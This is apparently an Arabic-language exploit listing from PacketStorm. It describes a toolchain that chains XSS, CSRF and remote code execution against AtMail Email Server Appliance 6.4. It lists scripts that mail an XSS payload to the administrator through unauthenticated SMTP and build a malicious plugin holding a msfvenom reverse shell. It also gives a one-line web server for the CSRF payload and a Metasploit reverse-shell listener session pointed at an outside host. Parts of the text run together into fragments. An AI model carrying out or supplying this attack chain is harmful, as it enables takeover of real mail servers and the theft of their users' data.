
AtMail Email Server Appliance 6.4 - سلسلة أدوات الاستغلال (XSS > CSRF > RCE)
[PacketStorm] [WLB-2020080010]
إخلاء مسؤولية: استُلهمت سلسلة أدوات الاستغلال هذه من EDB-ID 20009.
الهدف من سلسلة أدوات الاستغلال هذه هو استبدال EDB-ID 20009.
مزايا سلسلة الأدوات هذه مقارنة باستغلال EDB-ID 20009:
عيوب استغلال EDB-ID 20009:
msfvenom لتوليد الصدفة العكسية)تثبيت المتطلبات على ArchLinux:
$ sudo pacman -S metasploit tar ruby
ملفات الاستغلال:
config.yml على تكوين سلسلة الأدواتexploit.sh غلاف الاستغلال الذي يجب تنفيذهxss_mail.rb البريد الإلكتروني الذي يحتوي على XSS إلى المسؤول عبر خادم SMTP الخاص بـ Atmail (بدون مصادقة).csrf_prepare.rb بتحضير حمولة CSRF (تحديد الهدف وترميز أرشيف الإضافة)rce_prepare.rb بتحضير RCE (توليد الصدفة العكسية وإنشاء أرشيف الإضافة)csrf_plugin.js حمولة CSRF المجهزةnoraj/ الذي يحتوي على بنية الإضافة غير المضغوطةتتطلب سلسلة أدوات الاستغلال خطوتين يدويتين فقط:
config.ymlexploit.shلكن قبل شن الهجوم، يجب أن يقوم خادم ويب بتسليم ملف JavaScript الخاص بـ CSRF، ويجب أن يكون مستمع الصدفة العكسية بانتظار الاتصال. لذا سيبدو الهجوم أكثر كالتالي:
config.ymlcsrf_plugin.jsexploit.shمثال على خادم HTTP من سطر واحد:
$ ruby -run -e httpd . -p 8000
مثال على مستمع الصدفة العكسية:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/reverse_php
payload => php/reverse_php
msf5 exploit(multi/handler) > set LHOST 1.1.1.1
LHOST => 1.1.1.1
msf5 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf5 exploit(multi/handler) > run